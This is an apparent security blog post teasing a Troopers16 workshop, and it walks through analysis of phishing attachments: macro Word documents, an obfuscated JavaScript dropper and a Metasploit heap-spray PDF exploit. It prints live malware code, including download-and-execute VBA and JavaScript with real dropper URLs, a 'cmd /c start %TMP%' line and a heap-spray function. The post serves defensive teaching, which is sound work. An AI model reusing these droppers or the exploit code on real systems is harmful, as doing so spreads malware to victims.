As we are giving another round of our Incident Analysis workshop at Troopers16, we wanted to give a little sample taste what you can expect.
Table of Contents
Extracting Mail Attachments
Word Document Analysis
Static JavaScript Analysis
Dynamic JavaScript Analysis
Before we dive into the analysis, I wanted to mention that if you are going to analyze anything unknown/potentially malicious, do it in a safe environment (VM with no internet connection, in the best case on a separate physical analysis device, or at least strip all unnecessary functionality from that VM (CVE-2015-3456 is an example to answer the “why”)). Even things like looking at content with a text editor or extracting zip files should be done in the safe environment, as those tools could contain vulnerabilities.
The last days, a flood of word documents and zip files containing VBA/JavaScript code have been targeting multiple customers and end users (see for example this Heise article). If you ended up like me with 50+ mails containing potential interesting malicious files and want to save them all, you could either just save the attachments from all emails by hand or use a more automised approach (guess what we are going to do ; ) ):
Extracting Mail Attachments
Just select all emails, save them in a folder (as .eml), copy them to your VM, and for example download an EML parser like this: https://github.com/sim0nx/eml_parser
It is a library for EML file parsing and comes with an example script which fulfills our needs: It recursively extracts all attachments from all EML files in the current directory:
cd /opt
git clone https://github.com/sim0nx/eml_parser.git
cd eml_parser
python setup.py install
cd /path/to/eml-files
python /opt/eml_parser/examples/recursively_extract_attachments.py
In my case I now have a folder full of .doc, .zip and .eml files. Let’s start with the word documents.
Word Document Analysis
When using file on those documents, it seems like those are not pre 2007 word documents but the new format (xml in zip):
$ file *
invoice_03734122_scan.doc: Microsoft Word 2007+
invoice_24708980_scan.doc: Microsoft Word 2007+
invoice_29445235_scan.doc: Microsoft Word 2007+
invoice_37795202_scan.doc: Microsoft Word 2007+
invoice_57373814_scan.doc: Microsoft Word 2007+
invoice_80698424_scan.doc: Microsoft Word 2007+
invoice_94222883_scan.doc: Microsoft Word 2007+
invoice_95159767_scan.doc: Microsoft Word 2007+
[...]
So you could now just simply unzip the file and have a look at the content or use tools for word document analysis which also extract included objects. The malicious part in that word document might be nothing (could be harmless), pictures, OLE objects, VBA script, … To analyze and extract those objects we can use e.g. viper (https://github.com/viper-framework/viper), which is a framework for file analysis and supports PE, PDF, Flash, Word Docs, … :
python viper.py viper > viper > open -f invoice_03734122_scan.doc viper invoice_03734122_scan.doc [not stored] > office -v [*] Macro's Detected [*] Stream Details - OLE Stream: VBA/ThisDocument - VBA Filename: ThisDocument.cls [*] Stream Details - OLE Stream: VBA/trekdddjvjb - VBA Filename: trekdddjvjb.bas [*] Stream Details - OLE Stream: VBA/oerdkaksnc - VBA Filename: oerdkaksnc.bas [...] [*] AutoRun Macros Found +---------------+----------------------------------------+ | Method | Description | +---------------+----------------------------------------+ | AutoOpen | Runs when the Word document is opened | | Workbook_Open | Runs when the Excel Workbook is opened | +---------------+----------------------------------------+ [*] Suspicious Keywords Found +----------------+----------------------------------------------------------------------+ | KeyWord | Description | +----------------+----------------------------------------------------------------------+ | Base64 Strings | Base64-encoded strings were detected, may be used to obfuscate strings (option --decode to see all) | | Environ | May read system environment variables | | Chr | May attempt to obfuscate specific strings | | StrReverse | May attempt to obfuscate specific strings | | Base64 Strings | Base64-encoded strings were detected, may be used to obfuscate strings (option --decode to see all) | | CreateObject | May create an OLE object | | SaveToFile | May create a text file | | Open | May open a file | | Shell | May run an executable file or a system command | | Write | May write to a file (if combined with Open) | | StrReverse | May attempt to obfuscate specific strings | [...] [*] Possible IOC's +----------+----------------------+ | IOC | Type | +----------+----------------------+ | rj48.exe | Executable file name | +----------+----------------------+ [...]
This output already gives a good indication that this file might serve malicious purposes. But let’s have a closer look at the VBA code. OfficeMalScanner (http://www.reconstructer.org/code.html) is another tool for office document analysis (also to mention: didier stevens oledump) which also supports pre 2007 file formats. When applying it once for the word document it extracts besides other content a bin file called “vbaProject.bin”. As this file is not really human readable ; ) you can run this tool again on that bin file and might get the decompressed VBA project:
C:\data> OfficeMalScanner.exe invoice_03734122_scan.doc inflate +------------------------------------------+ | OfficeMalScanner v0.61 | | Frank Boldewin / www.reconstructer.org | +------------------------------------------+ [*] INFLATE mode selected [*] Opening file invoice_03734122_scan.doc [*] Filesize is 24680 (0x6068) Bytes [*] Microsoft Office Open XML Format document detected. Found 14 files in this archive [Content_Types].xml ----- 1453 Bytes ----- at Offset 0x00000000 _rels/.rels ----- 590 Bytes ----- at Offset 0x000003c0 word/_rels/document.xml.rels ----- 939 Bytes ----- at Offset 0x000006e0 word/document.xml ----- 1980 Bytes ----- at Offset 0x00000938 word/vbaProject.bin ----- 40960 Bytes ----- at Offset 0x00000bcc word/_rels/vbaProject.bin.rels ----- 277 Bytes ----- at Offset 0x000039dc word/theme/theme1.xml ----- 6786 Bytes ----- at Offset 0x00003ad7 word/vbaData.xml ----- 1757 Bytes ----- at Offset 0x00004143 word/settings.xml ----- 4089 Bytes ----- at Offset 0x00004382 docProps/app.xml ----- 1004 Bytes ----- at Offset 0x000048e5 word/styles.xml ----- 27602 Bytes ----- at Offset 0x00004c0a docProps/core.xml ----- 740 Bytes ----- at Offset 0x000056e3 word/fontTable.xml ----- 1261 Bytes ----- at Offset 0x0000598f word/webSettings.xml ----- 514 Bytes ----- at Offset 0x00005b84 ----------------------------------------------------------------------------- Content was decompressed to C:\data\DecompressedMsOfficeDocument Found at least 1 ".bin" file in the MSOffice document container. Try to scan it manually with SCAN+BRUTE and INFO mode. ----------------------------------------------------------------------------- C:\data> OfficeMalScanner.exe vbaProject.bin info +------------------------------------------+ | OfficeMalScanner v0.61 | | Frank Boldewin / www.reconstructer.org | +------------------------------------------+ [*] INFO mode selected [*] Opening file C:\data\vbaProject.bin [*] Filesize is 40960 (0xa000) Bytes [*] Ms Office OLE2 Compound Format document detected ----------------------------------------- [Scanning for VB-code in VBAPROJECT.BIN] ----------------------------------------- Class1 Class2 Class3 Class4 Class5 Class6 Class7 Class8 Class9 Class10 aIuhYqZk jduyewiskd oerdkaksnc oGdyeJdhsdd trekdddjvjb ThisDocument ----------------------------------------------------------------------------- VB-MACRO CODE WAS FOUND INSIDE THIS FILE! The decompressed Macro code was stored here: ------> C:\data\VBAPROJECT.BIN-Macros -----------------------------------------------------------------------------
Looking at the VBA classes quickly reveals their purpose. Following some excerpts:
$ cat jduyewiskd // serves the Microsoft.XMLHTTP object
[...]
Public Function IdjcTrsj()
IdjcTrsj = StrReverse("PTTHLMX.tfosorciM")
End Function
[...]
$ cat trekdddjvjb // serves the http download string
Attribute VB_Name = “trekdddjvjb”
Public Function oPlKtRebGf()
hyyuejkjs = “/h90”
yyeidsadf = “8/ckgig”
iuyhgdfsdf = oGdyeJdhsdd.TextBox1
yeuijjffsa = “rj48.exe”
oPlKtRebGf = oGdyeJdhsdd.TextBox4 + iuyhgdfsdf + hyyuejkjs + yyeidsadf + yeuijjffsa
End Function
$ cat aIuhYqZk // sends the request and stores the the response body to a local file
[…]
aIuhYqZk:Set xxxxxxxxxsssss = CreateObject(jduyewiskd.IdjcTrsj)
[…]
xxxxxxxxxsssss.Open StrReverse(“TSOP”), trekdddjvjb.oPlKtRebGf, False
[…]
xxxxxxxxxsssss.send
[…]
$ cat oerdkaksnc // serves the local filename: shereder.exe
[…]
nHdiPwTgFsd = Environ(jduyewiskd.uYtbdTsc) & Chr$(47) & Chr$(115) & Chr$(104) & Chr$(101) & Chr$(114) & Chr$(101) & Chr$(100) & Chr$(101) & Chr$(114) + oGdyeJdhsdd.TextBox3
[…]
We tried different tools for this VBA project, but it seems like those fail to completely reconstruct the VBA code, but we can still reconstruct enough to get a fair understanding, especially when combined with the output from “strings”:
$ strings vbaProject.bin
[...]
cmd /c start %TMP%/shereder.exe
http://
cujamslud.com
[...]
It seems that this VBA script downloads a PE file (http://cujamslud.com/h908/ckgigrj48.exe) using an XMLHTTP request and might probably 😉 start that file (cmd /c start %TMP%/shereder.exe) after dropping it to the file system (%TMP%/shereder.exe). At the time of writing this domain was not registered anymore, so we searched the Internet and found some resources, stating the same URL and also some IP information. As however the further analysis is (for example on the PE file) beyond the scope of this post, let’s now have a quick look at the previously mentioned zip files containing JS files. The first steps for our analysis are pretty easy:
Static JavaScript Analysis
Make sure the content is as expected (e.g. no path traversal attempt like in this example ; ) ). You can list the file names and their paths e.g. with:
$ unzip -l SCAN_invoice_16683879.zip
Archive: SCAN_invoice_16683879.zip
Length Date Time Name
--------- ---------- ----- ----
7616 12-11-2015 00:19 invoice_SCAN_I1oNI.js
--------- -------
7616 1 file
After verification and decompression, we have our JavaScript file.
At this point we could simply try to execute the JavaScript (of course in our “safe” environment), either with JavaScript engines or in a Windows VM and analyze the behavior. But since we first wanna try to deobfuscate that gibberish before doing any dynamic analysis, let’s go with that. There are many different tools to accomplish this task, but in the current context the best result gave the online tool from http://wepawet.iseclab.org.
It converted this:
var sHjQV=['','','','','','','','','','','\r','','','\n','','','','','','','','','','','','','','','','','','','
','!','"','#','$','%','&','\'','(',')','*','+',',','-
','.','/','0','1','2','3','4','5','6','7','8','9',':',';','<','=','>','?','@','A','B','C','D','E','F','G','H','I','J','K','L',
'M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z','[','\\',']','^','_','`','a','b','c','d','e','f','g','h','i','j','k','
l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','{','|','}','~','']
function IrxIt(WlsOnoPUwQL,RhsFEGiBvKyEi,oqagwARr){Jcfe=parseInt(WlsOnoPUwQL,RhsFEGiBvKyEi);pkZmZ=Jcfe.toString(oqagwARr);return pkZmZ;}function ccvXhbdUiOvitTb(tPKkbNkQJTmPAyLEp){eval(tPKkbNkQJTmPAyLEp)}
function VjFqTHurmqtPIXVHADFTKYagAASNPlLbBpJMzcyQznedGTSBBNFUdg(PbZTITbQguOvO,FRwgqMXymZllAn){ return sHjQV[IrxIt(PbZTITbQguOvO[FRwgqMXymZllAn],(16005+144)/769,(995+895)/189)];}
function luVNExc(NlinosAHbTNhakHwueEFwXfSBGrxCuBeLUii) {return !isNaN(parseFloat(NlinosAHbTNhakHwueEFwXfSBGrxCuBeLUii)) && isFinite(NlinosAHbTNhakHwueEFwXfSBGrxCuBeLUii);}
function WoWVacmBoeP(PGFyXNIP,ylcvQp){return PGFyXNIP.split(ylcvQp)}
var k=new Array("d","a","d","a","5d","4d","59","1b","37","1b","2j","1b","1d","5a","56","4i","5b","28","5e","4h","4e","4h","5f","5b","59"
,"4d","50","55","24","4f","56","54","25","2e","2d","24","4h","5f","4h","30","1b","2a","2c","24","27","2b","27","24","2b","28",
"24","28","29","27","25","2e","2d","24","4h","5f","4h","30","1b","30","1b","30","1d","24","5a","57","53","50","5b","1j","1d","
[15 more lines]
var Z=new Array("2e","2a","2f","2h","d","a","4i","56","59","1b","1j","5d","4d","59","1b","52","2j","58","5g","32","2h","1b","52","2i",
"37","24","53","4h","55","4j","5b","4k","2h","1b","52","21","21","1k","1b","1b","5i","d","a","1b","1b","5d","4d","59","1b",
"36","58","1b","2j","1b","26","2h","d","a","1b","1b","5b","59","5g","1b","1b","5i","d","a","9","57","56","50","1b","2j","1b",
[20 more lines]
var YVAZk=[k,Z];
var RDNLwnEvG=[];
function MlhIzdPZPoDOwIMyz(YVAZk){sfGKPFjfYWJ= '';bMXXPRpAhUk=(-678+678)/697; while(true){if(bMXXPRpAhUk >= (350+478)/414)break;RDNLwnEvG[bMXXPRpAhUk]=(-448+448)/856; while(true) { if(RDNLwnEvG[bMXXPRpAhUk] > YVAZk[bMXXPRpAhUk].length-(-35+140)/105) { break; } if (luVNExc(IrxIt(YVAZk[bMXXPRpAhUk][RDNLwnEvG[bMXXPRpAhUk]],(16471+728)/819,(9471+19)/949))) {sfGKPFjfYWJ += VjFqTHurmqtPIXVHADFTKYagAASNPlLbBpJMzcyQznedGTSBBNFUdg([YVAZk[bMXXPRpAhUk][RDNLwnEvG[bMXXPRpAhUk]]], (-467+467)/398);} RDNLwnEvG[bMXXPRpAhUk]++;}bMXXPRpAhUk++;} return sfGKPFjfYWJ}
ccvXhbdUiOvitTb(MlhIzdPZPoDOwIMyz(YVAZk));
To this:
var F = "soft2webextrain.com/87.exe? 46.151.52.231/87.exe? ? ?".split(" "); var nzT = ((1/*dRtI52245596n513333uM354193eOiZ*/) ? "WScri" : "") + "pt.Shell"; var Nn = WScript.CreateObject(nzT); var Zb = "%TEMP%\\"; var dwM = Nn.ExpandEnvironmentStrings(Zb); var xwS = "2.XMLH"; var XDm = xwS + "TTP"; var Es = true, rUjG = "ADOD"; var cT = WScript.CreateObject("MS" + "XML" + (34461, XDm)); var zRr = WScript.CreateObject(rUjG + "B.St" + (399562, "ream")); var qyA = 0; var i = 1; var hoaOWrt = 91849; for (var k = qyA; k < F.length; k ++ ){ var Eq = 0; try { poi = "GET"; cT.open(poi, "http://" + F[k] + i, false); cT.send(); if (cT.status == 666 - 466){ zRr.open(); zRr.type = 1; zRr.write(cT.responseBody); if (zRr.size > 19446 - 340){ Eq = 1; zRr.position = 0; zRr.saveToFile/*uZMX34V9eG*/(dwM/*b9oA23mO8o*/ + hoaOWrt + ".exe", 4 - 2); try { if (((new Date()) > 0, 7668985888)){ Nn./*d652458uTuQ*/Run(dwM + hoaOWrt +/* 7kC453EHUY */ ".exe" ,/* YlmN21RbgX */ 3 - 2, 0); break ; } } catch (HJ){ } ; } ; zRr.close(); } ; if (Eq == 1){ qyA = k; break ; } ; } catch (HJ){ } ; } ;
Pretty neat.
This script seems to do pretty much the same as our VBA script previously: Downloads a PE file (http://soft2webextrain.com/87.exe?1) via XMLHTTP request (MSXML2.XMLHTTP), stores it on the file system (%TEMP%\91849.exe) and executes it. That was really easy thanks to deobfuscation.
So one of the next analysis steps would be a download of this “87.exe” file and further analysis, but this is again beyond the scope of this post and will be covered in our workshop.
Dynamic JavaScript Analysis
In a case where deobfuscation doesn’t work, the following steps represent a dynamic approach to analyze unknown JS. In this example we use the JavaScript extracted from a PDF, generated with Metasploit for the vulnerability CVE-2009-3953.
From within our VM, we can use one of these tools to execute the JavaScript in a controlled way (as long as you follow some precautions):
- Spidermonkey (Mozilla’s JavaScript engine written in C/C++)
- SlimerJS (built on top of Gecko and SpiderMonkey – like Firefox)
- PhantomJS (built on top of WebKit and JavaScriptCore – like Safari )
The main difference between those is that Spidermonkey supports only JS and no HTML and so on. One important point: If you are aware which JavaScript Engine the malicious code is attacking, you might wanna use one of the others ; )
Starting Spidermonkey is as simple as typing ‘js’ from a shell:
js
js>
Before starting to paste unknown JavaScript, you should be aware that everything you paste is executed by the JavaScript engine and might already exploit a vulnerability. So to prevent this, a first simple rule is to overwrite dangerous functions like “eval” via this command:
eval = print
From now on, everything given to eval will not be evaluated but only printed.
The next advise is to paste only one command at a time to investigate what is happening. But now enough with all that safety stuff, let’s see what we get. The function of interest (it’s only one of two relevant functions) looks like this:
function g(FAKMoQN) { var ZlxHFeJtb = 1000; var kHrJoBEVotHFwefWoEVZSENEVJE = new Array(ZlxHFeJtb); var mcBnbQteW = unescape("%u0000%u0000%u0000%u0001%u1020%u0901%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000"); var oeGHnIredEOzjuO = unescape("%u5858"); while (oeGHnIredEOzjuO.length <= FAKMoQN/2 - mcBnbQteW.length) oeGHnIredEOzjuO += oeGHnIredEOzjuO; for (enySsPTVlkEkBtVEtNviOwoLn=0; enySsPTVlkEkBtVEtNviOwoLn < ZlxHFeJtb; enySsPTVlkEkBtVEtNviOwoLn+=1) { QoFafVURIRIyZQRxgYQpKmHVkjIunzUv = ""+enySsPTVlkEkBtVEtNviOwoLn; kHrJoBEVotHFwefWoEVZSENEVJE[enySsPTVlkEkBtVEtNviOwoLn]=mcBnbQteW + oeGHnIredEOzjuO.substring(0,FAKMoQN/2-mcBnbQteW.length); } for (abhKMyoXpvnvMnBFhGzhu=0;abhKMyoXpvnvMnBFhGzhu<100;abhKMyoXpvnvMnBFhGzhu++) { for (enySsPTVlkEkBtVEtNviOwoLn=ZlxHFeJtb/2; enySsPTVlkEkBtVEtNviOwoLn < ZlxHFeJtb-2; enySsPTVlkEkBtVEtNviOwoLn+=2) { kHrJoBEVotHFwefWoEVZSENEVJE[enySsPTVlkEkBtVEtNviOwoLn]=null; kHrJoBEVotHFwefWoEVZSENEVJE[enySsPTVlkEkBtVEtNviOwoLn]=oeGHnIredEOzjuO.substring(0,0x10000/2 )+"A"; kHrJoBEVotHFwefWoEVZSENEVJE[enySsPTVlkEkBtVEtNviOwoLn]=null; } } return kHrJoBEVotHFwefWoEVZSENEVJE; }
This function is called later on like this:
var mcBnbQteWs = g(6500);
When simply pasting the complete code and trying to print all the generated variables (in the original exploit code is one additional function), you are in luck if the print returns at any point in time and doesn’t kill spidermonkey. So for this part, it might be a better idea to supply not 6500 but 1 to the “g” function:
js> g(1)
["\0\0\0\x01\u1020\u0901\0\0\0\0\0\0\0\0\0\0\0\0", "\0\0\0\x01\u1020\u0901\0\0\0\0\0\0\0\0\0\0\0\0", "\0\0\0\x01\u1020\u0901\0\0\0\0\0\0\0\0\0\0\0\0", "\0\0\0\x01\u1020\u0901\0\0\0\0\0\0\0\0\0\0\0\0", "\0\0\0\x01\u1020\u0901\0\0\0\0\0\0\0\0\0\0\0\0", "\0\0\0\x01\u1020\u0901\0\0\0\0\0\0\0\0\0\0\0\0", "\0\0\0\x01\u1020\u0901\0\0\0\0\0\0\0\0\0\0\0\0", "\0\0\0\x01\u1020\u0901\0\0\0\0\0\0\0\0\0\0\0\0", "\0\0\0\x01\u1020\u0901\0\0\0\0\0\0\0\0\0\0\0\0", "\0\0\0\x01\u1020\u0901\0\0\0\0\0\0\0\0\0\0\0\0", "\0\0\0\x01\u1020\u0901\0\0\0\0\0\0\0\0\0\0\0\0", "\0\0\0\x01\u1020\u0901\0\0\0\0\0\0\0\0\0\0\0\0", "\0\0\0\x01\u1020\u0901\0\0\0\0\0\0\0\0\0\0\0\0", "\0\0\0\x01\u1020\u0901\0\0\0\0\0\0\0\0\0\0\0\0", "\0\0\0\x01\u1020\u0901\0\0\0\0\0\0\0\0\0\0\0\0", "\0\0\0\x01\u1020\u0901\0\0\0\0\0\0\0\0\0\0\0\0", "\0\0\0\x01\u1020\u0901\0\0\0\0\0\0\0\0\0\0\0\0"
[...]
The fact that the two functions used (the second one has been stripped from this post) generate really LARGE arrays gives a good indication that this script tries to exploit a vulnerability using heap spraying. Having a look in the metasploit module, we get even developer notes on this exploit:
Original notes on heap technique used in this exploit: ## PREPAREHOLES: ## We will construct 6500*20 bytes long chunks starting like this ## |0 |6 |8 |C |24 |size ## |00000... |0100|20100190|0000... | ......pad...... | ## \ \ ## \ \ -Pointer: to controlled data ## \ -Flag: must be 1 [...]
As we normally don’t have exploit developer notes for zero day stuff ;-), the next step is normally a dynamic analysis to see what this code is doing. An easy approach to accomplish this task is using cuckoo, but this is also beyond the scope of this little post and will also be covered in our workshop.
We hope you enjoyed this post and are looking forward to see you at Troopers16.